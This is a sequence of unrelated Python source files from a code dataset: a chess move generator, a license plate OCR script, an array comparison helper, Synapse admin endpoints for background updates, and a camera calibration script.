lines:\n                    if self.board[sq[0]+8*sq[1]]==\"o\": moves.append(sq[0]+8*sq[1])\n                    else : \n                        if self.board[sq[0]+8*sq[1]].isupper()!=color : moves.append(sq[0]+8*sq[1])\n                        break\n            return moves \n        def get_queen_moves(i,color):\n            \"Returns the moves for a queen of color color\"\n            moves = get_bishop_moves(i,color)+get_rook_moves(i,color)\n            return moves\n        def get_knight_moves(i,color):\n            \"Returns the moves for a knight of color color\" \n            x = i%8\n            y = i//8\n            moves = []\n            squares = []\n            squares.extend([(x+2,y+1),(x+2,y-1),(x-2,y+1),(x-2,y-1),(x+1,y+2),(x+1,y-2),(x-1,y+2),(x-1,y-2)])\n            for sq in squares[:]:\n                if sq[0] in range(8) and sq[1] in range(8):\n                    if self.board[sq[0]+sq[1]*8]==\"o\": moves.append(sq[0]+8*sq[1])\n                    elif self.board[sq[0]+sq[1]*8].isupper()!=color: moves.append(sq[0]+8*sq[1])\n            return moves\n\n        def get_king_moves(i,color):\n            \"Returns the moves for a king of color color\" \n            x = i%8\n            y = i//8\n            moves = []\n            squares = []\n            squares.extend([(x+1,y+1),(x+1,y),(x+1,y-1),(x-1,y+1),(x-1,y),(x-1,y-1),(x,y+1),(x,y-1)])\n            for sq in squares[:]:\n                if sq[0] in range(8) and sq[1] in range(8):\n                    if self.board[sq[0]+sq[1]*8]==\"o\": moves.append(sq[0]+8*sq[1])\n                    elif self.board[sq[0]+sq[1]*8].isupper()!=color: moves.append(sq[0]+8*sq[1])\n            \n            return moves\n        def get_pawn_moves(i,color):\n            \"Returns the moves for a pawn of color color\"\n            x = i%8\n            y = i//8\n            moves=[]\n            if color:\n                if self.board[i-8]==\"o\": \n                    moves.append(i-8)\n                    if y==6 and self.board[i-16]==\"o\": moves.append(i-16)\n                if x+1 in range(8) and (self.board[i-7]!=\"o\" and not self.board[i-7].isupper()) or (i-7 == self.enpassant): moves.append(i-7)\n                if x-1 in range(8) and (self.board[i-9]!=\"o\" and not self.board[i-9].isupper()) or (i-9 == self.enpassant): moves.append(i-9)\n            else:\n                if self.board[i+8]==\"o\": \n                    moves.append(i+8)\n                    if y==1 and self.board[i+16]==\"o\": moves.append(i+16)\n                if x+1 in range(8) and ( (self.board[i+9]!=\"o\" and self.board[i+9].isupper()) or (i+9 == self.enpassant) ): moves.append(i+9)\n                if x-1 in range(8) and ( (self.board[i+7]!=\"o\" and self.board[i+7].isupper()) or (i+7 == self.enpassant) ): moves.append(i+7)\n            return moves\n        moves=[]\n        if self.board[i] != \"o\" and self.board[i].isupper() == turn:\n            if self.board[i]==\"r\" or self.board[i]==\"R\": moves=get_rook_moves(i,turn)\n            if 
self.board[i]==\"b\" or self.board[i]==\"B\": moves=get_bishop_moves(i,turn)\n if self.board[i]==\"n\" or self.board[i]==\"N\": moves=get_knight_moves(i,turn)\n if self.board[i]==\"q\" or self.board[i]==\"Q\": moves=get_queen_moves(i,turn)\n if self.board[i]==\"k\" or self.board[i]==\"K\": moves=get_king_moves(i,turn)\n if self.board[i]==\"p\" or self.board[i]==\"P\": moves=get_pawn_moves(i,turn)\n return moves\n def is_square_controlled(self,i,color):\n \"zwraca prawdę, jesli dane pole jest atakowane przez bierki koloru color\"\n if color: squares =self.white\n else: squares = self.black\n for sq in squares:\n if self.board[sq]==\"p\":\n if sq%8>0 and sq+7==i: return True\n if sq%8<7 and sq+9==i: return True\n elif self.board[sq]==\"P\":\n if sq%8>0 and sq-9==i: return True\n if sq%8<7 and sq-7==i: return True\n else:\n if i in self.get_moves_unsafeking(sq,color): return True\n return False\n\n def move_piece(self,i,j):\n \"przesuwa bierkę z pola i do pola j. Zakładamy, że wiemy już, że to jest poprawny ruch\"\n self.turn = not self.turn\n self.move_counter+=1\n if (self.board[i] ==\"p\" or self.board[i] ==\"P\") and (abs(i-j)==16): self.enpassant=int((i+j)/2)\n else : self.enpassant = -1\n if self.board[i] ==\"k\" : \n self.castle[1]=False\n self.kings[1]=j\n if self.board[i] ==\"K\" : \n self.castle[0]=False\n self.kings[0]=j\n if self.board[i].isupper(): \n self.white.remove(i)\n self.white.append(j)\n if j in self.black : self.black.remove(j)\n else:\n self.black.remove(i)\n self.black.append(j)\n if j in self.white : self.white.remove(j) \n \n self.board[j]=self.board[i]\n self.board[i]=\"o\"\n self.kings_attacked = self.is_square_controlled(self.kings[0],False),self.is_square_controlled(self.kings[1],True)\n \n def get_moves(self,i):\n \"zwraca dostępne ruchy dla figury z danego pola biorąc pod uwagę bezpieczeństwo króla. Turn informuje czyja jest tura. 
\"\n turn = self.turn\n if i==-1: return []\n moves = self.get_moves_unsafeking(i,turn)\n for sq in moves[:]:\n gra = copy.deepcopy(self)\n gra.move_piece(i,sq)\n if self.turn : king_square = gra.kings[0]\n else : king_square=gra.kings[1]\n if gra.is_square_controlled(king_square,not turn): moves.remove(sq)\n return moves\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"szymji99/Chess","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19883652362","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 25 20:1 7:29 2022\r\n\r\n@author: Alfonso Blanco\r\n\"\"\"\r\n\r\nimport pytesseract\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport cv2\r\n######################################################################\r\n# PARAMETERS\r\n######################################################################\r\ndirname = \"test2\\\\images\"\r\ndirname_labels = \"test2\\\\labels\"\r\ndirname_licenses=\"TrueLicenses.txt\"\r\npytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\nbias=4.3\r\n\r\n\r\nX_resize=220\r\nY_resize=70\r\n\r\n\r\nIncthreshold=1.0\r\n\r\nContLoopMax=400\r\n######################################################################\r\n\r\nimport os\r\nimport re\r\n\r\nimport imutils\r\n#####################################################################\r\n\"\"\"\r\nCopied from https://gist.github.com/endolith/334196bac1cac45a4893#\r\n\r\nother source:\r\n https://stackoverflow.com/questions/46084476/radon-transformation-in-python\r\n\"\"\"\r\n\r\n\r\n\r\nfrom skimage.transform import radon\r\n\r\nimport numpy\r\nfrom numpy import mean, array, blackman, sqrt, square\r\nfrom numpy.fft import rfft\r\n\r\n\r\n\r\ntry:\r\n # More accurate peak finding from\r\n # https://gist.github.com/endolith/255291#file-parabolic-py\r\n from parabolic import parabolic\r\n\r\n def argmax(x):\r\n return parabolic(x, numpy.argmax(x))[0]\r\nexcept ImportError:\r\n from numpy import argmax\r\n\r\n\r\ndef GetRotationImage(image):\r\n \r\n \r\n I=image\r\n I = I - mean(I) # Demean; make the brightness extend above and below zero\r\n \r\n \r\n # Do the radon transform and display the result\r\n sinogram = radon(I)\r\n \r\n \r\n # Find the RMS value of each row and find \"busiest\" rotation,\r\n # where the transform is lined up perfectly with the alternating dark\r\n # text and white lines\r\n \r\n # rms_flat does no exist in recent versions\r\n #r = array([mlab.rms_flat(line) for line in sinogram.transpose()])\r\n r = array([sqrt(mean(square(line))) for line in sinogram.transpose()])\r\n rotation = argmax(r)\r\n #print('Rotation: {:.2f} degrees'.format(90 - rotation))\r\n #plt.axhline(rotation, color='r')\r\n \r\n # Plot the busy row\r\n row = sinogram[:, rotation]\r\n N = len(row)\r\n \r\n # Take spectrum of busy row and find line spacing\r\n window = blackman(N)\r\n spectrum = rfft(row * window)\r\n \r\n frequency = argmax(abs(spectrum))\r\n \r\n return rotation, spectrum, frequency\r\n#####################################################################\r\n\r\n#########################################################################\r\ndef loadimages (dirname ):\r\n#########################################################################\r\n# adapted from:\r\n# https://www.aprendemachinelearning.com/clasificacion-de-imagenes-en-python/\r\n# by Alfonso Blanco 
García\r\n######################################################################## \r\n imgpath = dirname + \"\\\\\"\r\n \r\n images = []\r\n \r\n \r\n print(\"Reading images from \",imgpath)\r\n NumImage=-2\r\n \r\n \r\n for root, dirnames, filenames in os.walk(imgpath):\r\n \r\n \r\n NumImage=NumImage+1\r\n \r\n for filename in filenames:\r\n \r\n if re.search(\"\\.(jpg|jpeg|png|bmp|tiff)$\", filename):\r\n \r\n filepath = os.path.join(root, filename)\r\n \r\n image = cv2.imread(filepath)\r\n #https://stackoverflow.com/questions/51823228/get-orientation-pytesseract-python3\r\n #https://stackoverflow.com/questions/54047116/getting-an-error-when-using-the-image-to-osd-method-with-pytesseract\r\n #https://stackoverflow.com/users/5617608/esraa-abdelmaksoud\r\n #print(pytesseract.image_to_osd(Image.open(filepath), lang='eng', config='--psm 0 -c min_characters_to_try=5'))\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n \r\n images.append(gray)\r\n \r\n \r\n return images\r\n #########################################################################\r\ndef loadlabels (dirname ):\r\n #########################################################################\r\n \r\n ######################################################################## \r\n lblpath = dirname + \"\\\\\"\r\n \r\n labels = []\r\n \r\n \r\n print(\"Reading labels from \",lblpath)\r\n \r\n \r\n \r\n for root, dirnames, filenames in os.walk(lblpath):\r\n \r\n \r\n for filename in filenames:\r\n \r\n if re.search(\"\\.(txt)$\", filename):\r\n \r\n filepath = os.path.join(root, filename)\r\n \r\n f=open(filepath,\"r\")\r\n\r\n Conta=0\r\n for linea in f:\r\n \r\n lineadelTrain =linea.split(\" \")\r\n if lineadelTrain[0] == \"0\":\r\n Conta=Conta+1\r\n labels.append(linea)\r\n break\r\n f.close() \r\n if Conta==0:\r\n print(\"Rare labels without tag 0 on \" + filename )\r\n \r\n \r\n \r\n return labels\r\n \r\ndef loadTrueLicenses (dirname ): \r\n f=open(dirname)\r\n licenses=[]\r\n Conta=0\r\n for linea in f:\r\n # strip the trailing carriage return\r\n linea1=linea[0:len(linea)-1]\r\n licenses.append(linea1)\r\n Conta=Conta+1\r\n f.close() \r\n return licenses \r\n\r\n##########################################3\r\n# Bubble sort in Python\r\n#https://www.programiz.com/dsa/bubble-sort\r\ndef bubbleSort(array1,array2):\r\n \r\n # loop to access each array element\r\n for i in range(len(array1)):\r\n\r\n # loop to compare array elements\r\n for j in range(0, len(array1) - i - 1):\r\n\r\n # compare two adjacent elements\r\n # change > to < to sort in descending order\r\n if array1[j] < array1[j + 1]:\r\n\r\n # swapping elements if elements\r\n # are not in the intended order\r\n temp = array1[j]\r\n temp2= array2[j]\r\n array1[j] = array1[j+1]\r\n array2[j] = array2[j+1]\r\n array1[j+1] = temp\r\n array2[j+1] = temp2 \r\n###########################################################\r\n# MAIN\r\n##########################################################\r\n\r\nimages=loadimages(dirname)\r\n\r\nlabels=loadlabels(dirname_labels)\r\n\r\nTrueLicenses=loadTrueLicenses(dirname_licenses)\r\n\r\nprint(\"Number of images : \" + str(len(images)))\r\nprint(\"Number of labels : \" + str(len(labels)))\r\nprint(\"Number of true licenses : \" + str(len(TrueLicenses)))\r\n\r\nTotHits=0\r\nTotDetect=0\r\nTotDetectBad=0\r\nTotNoDetect=0\r\n\r\n\r\nNumberImageOrder=0\r\n\r\nfor i in range (len(images)):\r\n \r\n NumberImageOrder=NumberImageOrder+1\r\n \r\n lineaLabel =labels[i].split(\" \")\r\n \r\n # Meaning of fields in files labels\r\n 
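# YOLO labels store \"class x_center y_center width height\" with all\r\n # coordinates normalized to 0-1, so the code below rescales by 416,\r\n # which appears to assume 416x416 input images.\r\n 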
#https://github.com/ultralytics/yolov5/issues/2293\r\n #\r\n x_center=float(lineaLabel[1])\r\n y_center=float(lineaLabel[2])\r\n width=float(lineaLabel[3])\r\n height=float(lineaLabel[4])\r\n \r\n \r\n \r\n \r\n x_start= x_center - width*0.5\r\n x_end=x_center + width*0.5\r\n \r\n y_start= y_center - height*0.5\r\n y_end=y_center + height*0.5\r\n \r\n X_start=int(x_start*416)\r\n X_end=int(x_end*416)\r\n \r\n Y_start=int(y_start*416)\r\n Y_end=int(y_end*416)\r\n \r\n \r\n \r\n # Clipping the boxes in two positions helps\r\n # in license plate reading\r\n X_start=X_start + 3 \r\n \r\n Y_start=Y_start + 2\r\n \r\n \r\n \r\n image=images[i]\r\n \r\n cv2.imshow(\"Test \", image)\r\n \r\n cv2.waitKey()\r\n \r\n SwEnd=0\r\n \r\n SumBrightness=np.sum(image)\r\n Desv=np.std(image)\r\n if Desv < 45:\r\n print(\"Image with low standard deviation, will be difficult to recognize\")\r\n #print(\"Car\" + str(NumberImageOrder) + \" Brightness : \" +str(SumBrightness) + \r\n # \" Deviation : \" + str(Desv))\r\n threshold=(SumBrightness/177529.84) + bias\r\n print(\"SumBrightness = \" + str(SumBrightness) + \" Deviation = \" + str(Desv)) \r\n #print(\" threshold \" + str(threshold))\r\n gray=image[Y_start:Y_end, X_start:X_end]\r\n \r\n \r\n gray=cv2.resize(gray,None,fx=1.78,fy=1.78,interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.resize(gray, (X_resize,Y_resize), interpolation = cv2.INTER_AREA)\r\n \r\n SumBrightnessLic=np.sum(gray)\r\n DesvLic=np.std(gray)\r\n #print(\"Car\" + str(NumberImageOrder) + \" Brightness : \" +str(SumBrightnessLic) + \r\n # \" Deviation : \" + str(DesvLic))\r\n \r\n Conta=0\r\n ContLoop=0\r\n SwEnd=0\r\n Llicenses=[]\r\n \r\n while (ContLoop < ContLoopMax):\r\n \r\n if ContLoop >ContLoopMax: break\r\n ContLoop=ContLoop+1\r\n \r\n rotation, spectrum, frequency =GetRotationImage(gray)\r\n rotation=90 - rotation\r\n \r\n #print(\"Car\" + str(NumberImageOrder) + \" Brightness : \" +str(SumBrightnessLic) + \r\n # \" Deviation : \" + str(DesvLic))\r\n \r\n if rotation !=0 and rotation !=90:\r\n #print(\"ROTATING THE IMAGE \" + str(rotation) + \" DEGREES\")\r\n gray=imutils.rotate(gray,angle=rotation)\r\n \r\n \r\n #https://java2blog.com/cv2-threshold-python/\r\n #https://docs.opencv.org/4.x/d7/d4d/tutorial_py_thresholding.html\r\n \r\n #https://aicha-fatrah.medium.com/improve-the-quality-of-your-ocr-information-extraction-ebc93d905ac4\r\n \r\n \r\n ret, gray1=cv2.threshold(gray,threshold,255, cv2.THRESH_BINARY)\r\n \r\n #cv2.imshow(\"Test\", gray1)\r\n #cv2.waitKey()\r\n \r\n \r\n text = pytesseract.image_to_string(gray1, lang='eng', \\\r\n config='--psm 13 --oem 3') \r\n text = ''.join(char for char in text if char.isalnum())\r\n \r\n \r\n Confidence=\"\"\r\n Case=0\r\n \r\n # Special case with an extra character in the first position and\r\n # 7 more positions, e.g. 1063HFG\r\n if len(text) > 7:\r\n text=text[1:8]\r\n \r\n \r\n if len(text) > 6:\r\n #\r\n # Case of license plate formed by NNNNNNN, 7 numeric digits\r\n #\r\n if (text[0] >= \"0\" and text[0] <= \"9\"\r\n and text[1] >= \"0\" and text[1] <= \"9\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and (( text[4] >= \"0\" and text[4] <= \"9\") or text[4] == \" \")\r\n and (( text[5] >= \"0\" and text[5] <= \"9\") or text[5] == \" \")\r\n and text[6] >= \"0\" and text[6] <= \"9\"):\r\n \r\n Case=1\r\n else:\r\n # \r\n # Case of license plate format AAANNAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= 
\"Z\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"0\" and text[4] <= \"9\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=2\r\n else:\r\n # \r\n # Case of license plate format AANNAAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=3\r\n else:\r\n # \r\n # Case of license plate format AAAANNN\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and ((text[3] >= \"A\" and text[3] <= \"Z\"))\r\n and text[4] >= \"0\" and text[4] <= \"9\" \r\n \r\n and text[5] >= \"0\" and text[5] <= \"9\"\r\n and text[6] >= \"0\" and text[6] <= \"9\"):\r\n #and text[7] >= \"0\" and text[7] <= \"Z\"):\r\n Case=4\r\n else:\r\n # \r\n # Case of license plate format AAANAAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=5\r\n else:\r\n # \r\n # Case of license plate format AANNAAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=6\r\n else:\r\n # \r\n # Case of license plate format AANNAAA\r\n #\r\n if (((text[0] >= \"0\" and text[0] <= \"9\") )\r\n and text[1] >= \"0\" and text[1] <= \"9\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=7\r\n else:\r\n # \r\n # Case of license plate format AANNNN pero que se ha colado\r\n # un caracter en la primera posicion\r\n if (((text[1] >= \"A\" and text[1] <= \"Z\") )\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and ((text[4] >= \"0\" and text[4] <= \"9\"))\r\n and text[5] >= \"0\" and text[5] <= \"9\" \r\n \r\n and text[6] >= \"0\" and text[6] <= \"9\"):\r\n \r\n Case=8\r\n # \r\n # Case of license plate format AAANNN\r\n #\r\n else:\r\n if len(text) > 5:\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and (( text[4] >= \"0\" and text[4] <= \"9\") )\r\n \r\n and text[5] >= \"0\" and text[5] <= \"9\"):\r\n \r\n \r\n Case=9\r\n else: \r\n # Format AANNNN\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and (( text[4] >= \"0\" and text[4] <= \"9\") )\r\n \r\n and text[5] >= \"0\" and text[5] <= \"9\"):\r\n \r\n \r\n Case=10\r\n 
else:\r\n # Format ANAAA\r\n if len(text) > 4:\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n #pytesseract confuses 5 and S\r\n and ((text[1] >= \"0\" and text[1] <= \"9\") or text[1]==\"S\")\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and text[3] >= \"A\" and text[3] <= \"Z\"\r\n and text[4] >= \"A\" and text[4] <= \"Z\"):\r\n \r\n \r\n Case=11\r\n \r\n \r\n \r\n TextConfidence=Confidence + \" threshold : \" + str(threshold)\r\n if Case > 0: \r\n if Case==1 or Case==2 or Case==3 or Case==4 or Case==5 or Case==7:\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[0:7] + TextConfidence)\r\n Llicenses.append(text[0:7] )\r\n SwEnd=1\r\n else:\r\n if Case==8:\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[1:7]+TextConfidence)\r\n Llicenses.append(text[1:7] )\r\n SwEnd=1\r\n else:\r\n if Case==9 or Case==10:\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[0:6]+TextConfidence)\r\n Llicenses.append(text[0:6] )\r\n SwEnd=1\r\n else:\r\n if Case == 11 :\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[0:5]+TextConfidence)\r\n Llicenses.append(text[0:5] )\r\n \r\n \r\n SwEnd=0\r\n \r\n #\r\n # Halfway through the loop, \r\n # it searches in the negative direction for the threshold\r\n #\r\n if ContLoop==ContLoopMax/2:\r\n threshold=threshold- Incthreshold*ContLoop\r\n if ContLoop>=ContLoopMax/2:\r\n threshold=threshold-Incthreshold\r\n else:\r\n threshold=threshold+Incthreshold\r\n \r\n LTotLicenses=[]\r\n LSumLicenses=[]\r\n TotLicenses=0\r\n for y in range(len(Llicenses)):\r\n \r\n SwFounded=0\r\n for z in range(len(LTotLicenses)):\r\n if Llicenses[y]==LTotLicenses[z]:\r\n LSumLicenses[z]=LSumLicenses[z]+1\r\n TotLicenses=TotLicenses+1\r\n SwFounded=1\r\n break\r\n if SwFounded==0:\r\n LTotLicenses.append(Llicenses[y])\r\n LSumLicenses.append(1)\r\n TotLicenses=TotLicenses+1\r\n \r\n print(\"Licenses Car \" + str(NumberImageOrder)) \r\n \r\n bubbleSort(LSumLicenses,LTotLicenses)\r\n TextDetect=\"\"\r\n for w in range(len(LTotLicenses)):\r\n percent=LSumLicenses[w]/TotLicenses\r\n #https://docs.python.org/3/tutorial/inputoutput.html\r\n print (LTotLicenses[w] + \" {:2.2%}\".format(percent))\r\n \r\n \r\n if LTotLicenses[w] == TrueLicenses[i]:\r\n \r\n if w==0:\r\n TotHits=TotHits+1\r\n TextDetect=\" HIT\" + \" {:2.2%}\".format(percent)\r\n #break\r\n else:\r\n TotDetect=TotDetect+1\r\n TextDetect=\" DETECTED \" + \" {:2.2%}\".format(percent)\r\n #break\r\n if TextDetect==\"\":\r\n if len(LTotLicenses)==0:\r\n TotNoDetect=TotNoDetect+1\r\n TextDetect= \" DID NOT DETECT ANY LICENSE PLATE\"\r\n else:\r\n TotDetectBad=TotDetectBad+1\r\n TextDetect= \" ERROR, DETECTED OTHER LICENSE PLATE\"\r\n print( \"Car \" + str(NumberImageOrder) + \" the true license plate is: \" + TrueLicenses[i] + TextDetect) \r\n\r\nprint(\"\")\r\nprint(\"\")\r\nprint(\" total HITS : \" + str(TotHits))\r\nprint(\" total DETECTED : \" + str(TotDetect)) \r\nprint(\" total ERRONEOUS DETECTED : \" + str(TotDetectBad)) \r\nprint(\" total DID NOT RECOGNIZE : \" + str(TotNoDetect)) \r\n ","repo_name":"ablanco1950/LicensePlateImage_ThresholdFiltered","sub_path":"GetNumberLicencePlateV1.py","file_name":"GetNumberLicencePlateV1.py","file_ext":"py","file_size_in_byte":22504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9023240135","text":"import numpy as np\n\ndef 
comp_grad(f_ori, f_par):\n\tori = np.load(f_ori)\n\tpar = np.load(f_par)\n\n\tnsli = ori.shape[0]\n\tnrow = ori.shape[1]\n\tncol = ori.shape[2]\n\tndir = ori.shape[3]\n\n\tdiff = np.sum(np.abs(ori - par) > 1.e+7)\n\tif diff > 0:\n\t\tprint(diff)\n\t\tprint('different voxels')\n\telse:\n\t\tprint(diff)\n\t\tprint('all voxels are the same!')\n\n\n\n# A = np.ones((20, 20, 10))\n# B = 2 * np.ones((20, 20, 10))\n# s = np.sum(np.abs(A - B))","repo_name":"RicciWoo/registration","sub_path":"comp_npy_grad_3d.py","file_name":"comp_npy_grad_3d.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"28438648534","text":"import logging\nfrom typing import TYPE_CHECKING, Tuple\n\nfrom synapse.api.errors import SynapseError\nfrom synapse.http.servlet import RestServlet, parse_json_object_from_request\nfrom synapse.http.site import SynapseRequest\nfrom synapse.rest.admin._base import admin_patterns, assert_user_is_admin\nfrom synapse.types import JsonDict\n\nif TYPE_CHECKING:\n from synapse.server import HomeServer\n\nlogger = logging.getLogger(__name__)\n\n\nclass BackgroundUpdateEnabledRestServlet(RestServlet):\n \"\"\"Allows temporarily disabling background updates\"\"\"\n\n PATTERNS = admin_patterns(\"/background_updates/enabled\")\n\n def __init__(self, hs: \"HomeServer\"):\n self.group_server = hs.get_groups_server_handler()\n self.is_mine_id = hs.is_mine_id\n self.auth = hs.get_auth()\n\n self.data_stores = hs.get_datastores()\n\n async def on_GET(self, request: SynapseRequest) -> Tuple[int, JsonDict]:\n requester = await self.auth.get_user_by_req(request)\n await assert_user_is_admin(self.auth, requester.user)\n\n # We need to check that all configured databases have updates enabled.\n # (They *should* all be in sync.)\n enabled = all(db.updates.enabled for db in self.data_stores.databases)\n\n return 200, {\"enabled\": enabled}\n\n async def on_POST(self, request: SynapseRequest) -> Tuple[int, JsonDict]:\n requester = await self.auth.get_user_by_req(request)\n await assert_user_is_admin(self.auth, requester.user)\n\n body = parse_json_object_from_request(request)\n\n enabled = body.get(\"enabled\", True)\n\n if not isinstance(enabled, bool):\n raise SynapseError(400, \"'enabled' parameter must be a boolean\")\n\n for db in self.data_stores.databases:\n db.updates.enabled = enabled\n\n # If we're re-enabling them ensure that we start the background\n # process again.\n if enabled:\n db.updates.start_doing_background_updates()\n\n return 200, {\"enabled\": enabled}\n\n\nclass BackgroundUpdateRestServlet(RestServlet):\n \"\"\"Fetch information about background updates\"\"\"\n\n PATTERNS = admin_patterns(\"/background_updates/status\")\n\n def __init__(self, hs: \"HomeServer\"):\n self.group_server = hs.get_groups_server_handler()\n self.is_mine_id = hs.is_mine_id\n self.auth = hs.get_auth()\n\n self.data_stores = hs.get_datastores()\n\n async def on_GET(self, request: SynapseRequest) -> Tuple[int, JsonDict]:\n requester = await self.auth.get_user_by_req(request)\n await assert_user_is_admin(self.auth, requester.user)\n\n # We need to check that all configured databases have updates enabled.\n # (They *should* all be in sync.)\n enabled = all(db.updates.enabled for db in self.data_stores.databases)\n\n current_updates = {}\n\n for db in self.data_stores.databases:\n update = db.updates.get_current_update()\n if not update:\n continue\n\n current_updates[db.name()] = {\n \"name\": update.name,\n 
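# Progress counters for the update currently running on this database;\n                # note average_items_per_ms() is a method and is called here, while the\n                # other fields are plain attributes of the update object.\n                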
\"total_item_count\": update.total_item_count,\n \"total_duration_ms\": update.total_duration_ms,\n \"average_items_per_ms\": update.average_items_per_ms(),\n }\n\n return 200, {\"enabled\": enabled, \"current_updates\": current_updates}\n","repo_name":"casio/synapse","sub_path":"synapse/rest/admin/background_updates.py","file_name":"background_updates.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"23452580206","text":"# calibration.py\n# This calibrates for an adjustable (fwidth, fheight) shape image for each of 3 cameras\n# imports\nfrom imutils.video import VideoStream\nfrom datetime import datetime\nimport numpy as np\nimport imutils\nfrom time import sleep\nimport cv2\n\nvideo = False\nfps = 5\nx_adjust = 0\nfwidth = 640 # 608\nfheight = 480 # 464\nhalf_fwidth = fwidth//2\nhalf_fheight = fheight//2\nstamp = datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\")\ncalibration012 = \"/home/pi/md4/\" + stamp + \" calibration012.avi\"\n\nvs0 = VideoStream(usePiCamera=False,src=0).start() # left Zealinno webcam\nvs1 = VideoStream(usePiCamera=True,src=1,resolution=(fwidth,fheight)).start()\nvs2 = VideoStream(usePiCamera=False,src=2).start() # right Zealinno webcam\nif video == True:\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out012 = cv2.VideoWriter(calibration012,fourcc, fps, (3*fwidth,fheight))\nframe_count = 0\nsleep(10.0)\n\n# loop over the frames of the video\nwhile True:\n # grab the current frame\n frame0 = vs0.read()\n frame1 = vs1.read()\n frame2 = vs2.read()\n if frame0 is None or frame2 is None:\n break\n frame_count += 1 \n if frame_count == 1:\n print('frame shapes = ', frame0.shape, frame1.shape, frame2.shape)\n\n # Horizontal pixel x range = 0:fwidth-1\n # Vertical pixel y range = 0:fheight-1\n cv2.line(frame0, (half_fwidth, 0), (half_fwidth, fheight-1), (0, 0, 255), 1)\n cv2.line(frame0, (0, half_fheight), (fwidth-1, half_fheight), (255, 0, 255), 1)\n \n cv2.line(frame1, (half_fwidth, 0), (half_fwidth, fheight-1), (0, 0, 255), 1)\n cv2.line(frame1, (0, half_fheight), (fwidth-1, half_fheight), (255, 0, 255), 1)\n\n cv2.line(frame2, (half_fwidth+x_adjust, 0), (half_fwidth+x_adjust, fheight-1), (0, 0, 255), 1)\n cv2.line(frame2, (0, half_fheight), (fwidth-1, half_fheight), (255, 0, 255), 1)\n \n frame012 = np.hstack((frame0,frame1,frame2))\n cv2.imshow('frame012', frame012) \n if video == True:\n out012.write(frame012)\n key = cv2.waitKey(1) & 0xFF\n # if the `q` key is pressed, break from the loop\n if key == ord(\"q\"): # otherwise go to next loop iteration\n break\n\nif video == True:\n 